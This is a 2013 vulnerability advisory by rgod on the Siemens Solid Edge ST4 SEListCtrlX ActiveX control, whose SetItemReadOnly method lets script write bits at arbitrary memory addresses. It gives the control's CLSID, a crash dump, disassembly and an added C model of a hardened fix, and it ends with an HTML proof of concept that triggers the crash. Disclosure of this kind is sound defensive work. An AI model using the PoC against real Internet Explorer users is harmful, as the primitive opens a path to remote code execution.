SIEMENS Solid Edge ST4 SEListCtrlX ActiveX - SetItemReadOnly Arbitrary Memory Re
Source: vfocus.net  Author: rgod  Published: 2013-05-27
SIEMENS Solid Edge ST4 SEListCtrlX ActiveX Control SetItemReadOnly 
Arbitrary Memory Rewrite Remote Code Execution Vulnerability
   
tested against: Microsoft Windows Server 2003 r2 sp2
                Microsoft Windows XP sp3
                Internet Explorer 7/8
   
   
   
   
file tested: SolidEdgeV104ENGLISH_32Bit.exe
   
   
background:
   
the mentioned software installs an ActiveX control with
the following settings:
   
ActiveX settings:
ProgID: SELISTCTRLX.SEListCtrlXCtrl.1
CLSID: {5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D}
binary path: C:\Program Files\Solid Edge ST4\Program\SEListCtrlX.ocx
Safe For Scripting (Registry): True
Safe For Initialization (Registry): True
   
Vulnerability:
   
This control exposes the SetItemReadOnly() method, see typelib:
   
...
/* DISPID=14 */
    function SetItemReadOnly(
        /* VT_VARIANT [12]  */ $hItem,
        /* VT_BOOL [11]  */ $bReadOnly
        )
    {
    }
...
   
(i)
Passing a memory address as the first argument and 'false' as
the second lets you write a NULL byte inside an arbitrary
memory region.

(ii)
Passing a memory address as the first argument and 'true' as
the second lets you write a \x08 byte inside an arbitrary
memory region.

(The disassembly below shows the operation precisely: the method
treats the first argument as a pointer to an SEListItem and, after
nothing more than a NULL check, clears bit 0x08 of the dword at
offset 0x2C for 'false' or sets it for 'true'.)
   
Example crash:
   
EAX 61616161
ECX 0417AB44
EDX 01B7F530
EBX 0000000C
ESP 01B7F548
EBP 01B7F548
ESI 0417A930
EDI 027D5DD0 SEListCt.027D5DD0
EIP 033FD158 control.033FD158
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFD9000(4000)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty -NAN FFFF FFFFFFFF FFFFFFFF
ST1 empty 3.3760355862290856960e-4932
ST2 empty +UNORM 48F4 00000000 00000000
ST3 empty -2.4061003025887744000e+130
ST4 empty -UNORM C198 00000000 00000000
ST5 empty 0.0
ST6 empty 1633771873.0000000000
ST7 empty 1633771873.0000000000
               3 2 1 0      E S P U O Z D I
FST 4000  Cond 1 0 0 0  Err 0 0 0 0 0 0 0 0  (EQ)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1
   
Call stack of thread 000009B8
Address    Stack      Procedure / arguments                                                             Called from                   Frame
01B7F54C   027D5DF3   control.?SetItemReadOnly@SEListCtrl@@QAEXPAVSEListItem@@H@Z                       SEListCt.027D5DED             01B7F548
01B7F560   787FF820   Includes SEListCt.027D5DF3                                                        mfc100u.787FF81E              01B7F55C
01B7F56C   78807BF5   mfc100u.787FF810                                                                  mfc100u.78807BF0              01B7F618
01B7F61C   78808312   ? mfc100u.78807A5B                                                                mfc100u.7880830D              01B7F618
   
   
   
vulnerable code, inside control.dll (the "control" module in the call stack above):
...
;------------------------------------------------------------------------------
        Align   4
 ?SetItemReadOnly@SEListCtrl@@QAEXPAVSEListItem@@H@Z:
        push    ebp
        mov ebp,esp
        mov eax,[ebp+08h]
        test    eax,eax
        jz  L1011D15C
        cmp dword ptr [ebp+0Ch],00000000h
        jz  L1011D158
        or  dword ptr [eax+2Ch],00000008h <-------------------- it crashes here
        pop ebp
        retn    0008h
;------------------------------------------------------------------------------
...
   
...
;------------------------------------------------------------------------------
 L1011D158:
        and dword ptr [eax+2Ch],FFFFFFF7h <-------------------- or here          
 L1011D15C:
        pop ebp
        retn    0008h
;------------------------------------------------------------------------------
...
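As an added example (not rgod's code and not Siemens' code), the following C model reproduces the logic of the disassembly above, with the script-supplied handle used directly as a pointer, beside a hardened variant in which script only ever sees small opaque handles that the control resolves through a table it owns. The SEListItem layout, the handle table and all function names are assumptions; only the offset 0x2C and the bit value 0x08 come from the disassembly.

```c
/* Model of SEListCtrl::SetItemReadOnly (vulnerable shape) and a hardened shape.
 * Struct layout, handle table and names are assumptions for illustration. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define ITEM_READONLY 0x08u        /* bit OR'd in / AND'd out at [eax+2Ch] */

typedef struct SEListItem {
    uint8_t  opaque[0x2C];         /* assumed: fields preceding the flags dword */
    uint32_t flags;                /* sits at offset 0x2C, like [eax+2Ch] */
} SEListItem;

/* Vulnerable shape: hItem arrives from script and is dereferenced as-is.
 * Only a NULL check is performed, exactly as in the disassembly. */
void SetItemReadOnly_vulnerable(SEListItem *hItem, int bReadOnly) {
    if (hItem == NULL) return;                       /* test eax,eax / jz   */
    if (bReadOnly) hItem->flags |= ITEM_READONLY;    /* or  [eax+2Ch],8     */
    else           hItem->flags &= ~ITEM_READONLY;   /* and [eax+2Ch],FFFFFFF7h */
}

/* Hardened shape: handles are indices into a control-owned table, so an
 * arbitrary 32-bit value from script can never become a raw pointer. */
#define MAX_ITEMS 16
static SEListItem g_items[MAX_ITEMS];
static int        g_live[MAX_ITEMS];               /* 1 = handle is valid */

static SEListItem *resolve_handle(uint32_t hItem) {
    if (hItem == 0 || hItem > MAX_ITEMS) return NULL;  /* valid handles: 1..MAX_ITEMS */
    if (!g_live[hItem - 1]) return NULL;               /* stale or never allocated */
    return &g_items[hItem - 1];
}

uint32_t item_alloc(void) {                        /* returns a handle, 0 on failure */
    for (int i = 0; i < MAX_ITEMS; i++) {
        if (g_live[i]) continue;
        g_live[i] = 1;
        memset(&g_items[i], 0, sizeof g_items[i]);
        return (uint32_t)i + 1;
    }
    return 0;
}

int SetItemReadOnly_hardened(uint32_t hItem, int bReadOnly) {  /* 1 = ok, 0 = rejected */
    SEListItem *item = resolve_handle(hItem);
    if (item == NULL) return 0;
    if (bReadOnly) item->flags |= ITEM_READONLY;
    else           item->flags &= ~ITEM_READONLY;
    return 1;
}

uint32_t item_flags(uint32_t hItem) {              /* 0xFFFFFFFF for a bad handle */
    SEListItem *item = resolve_handle(hItem);
    return item ? item->flags : 0xFFFFFFFFu;
}
```

With the table-based variant the PoC's 0x61616161 argument is simply rejected instead of being dereferenced.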
   
Attached: code to reproduce the crash.
   
   
   
<!-- saved from url=(0014)about:internet -->
<html>
<object classid='clsid:5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D' id='obj'>
</object>
<script language='javascript'>
//obj.SetItemReadOnly(0x61616161,false);
obj.SetItemReadOnly(0x61616161,true);
</script>